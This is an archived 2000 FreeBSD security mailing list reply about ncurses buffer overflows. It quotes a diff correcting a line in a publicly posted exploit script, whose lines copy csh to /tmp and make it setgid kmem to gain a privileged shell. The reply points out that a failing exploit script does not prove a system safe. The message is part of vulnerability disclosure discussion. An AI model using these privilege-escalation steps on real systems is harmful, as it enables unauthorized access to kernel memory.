From owner-freebsd-security Tue Oct 10 17:58: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from toad.com (toad.com [140.174.2.1]) by hub.freebsd.org (Postfix) with ESMTP id 053BD37B66C for ; Tue, 10 Oct 2000 17:57:59 -0700 (PDT) Received: from grok.example.net (unknown@cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by toad.com (8.7.5/8.7.3) with ESMTP id RAA11312; Tue, 10 Oct 2000 17:57:55 -0700 (PDT) Received: by grok.example.net (Postfix, from userid 1000) id 9690F21316E; Tue, 10 Oct 2000 17:58:35 -0700 (PDT) Date: Tue, 10 Oct 2000 17:58:35 -0700 From: Steve Reid To: Mike Silbersack Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010175835.E9112@grok> References: <20001010165908.C9112@grok> <20001010175013.D9112@grok> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <20001010175013.D9112@grok>; from Steve Reid on Tue, Oct 10, 2000 at 05:50:13PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 10, 2000 at 05:50:13PM -0700, Steve Reid wrote: > --- exploit.csh.orig Tue Oct 10 17:42:49 2000 +++ exploit.csh Tue Oct 10 17:46:53 2000 > @@ -11,7 +11,7 @@ > #!/bin/csh > > cp /bin/csh /tmp > -/usr/sbin/chown venglin.kmem /tmp/csh > +chgrp kmem /tmp/csh > chmod 2755 /tmp/csh > __EOF__ BTW, the above is relative to the exploit Przemyslaw Frasunek posted to bugtraq. The one he posted to freebsd-security, the line was: /usr/sbin/chgrp kmem /tmp/csh Which also doesn't work because chgrp is in /usr/bin, not /usr/sbin. This just goes to show, that just because an exploit script doesn't work for you, doesn't mean that you are not vulnerable. Assume the worst! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message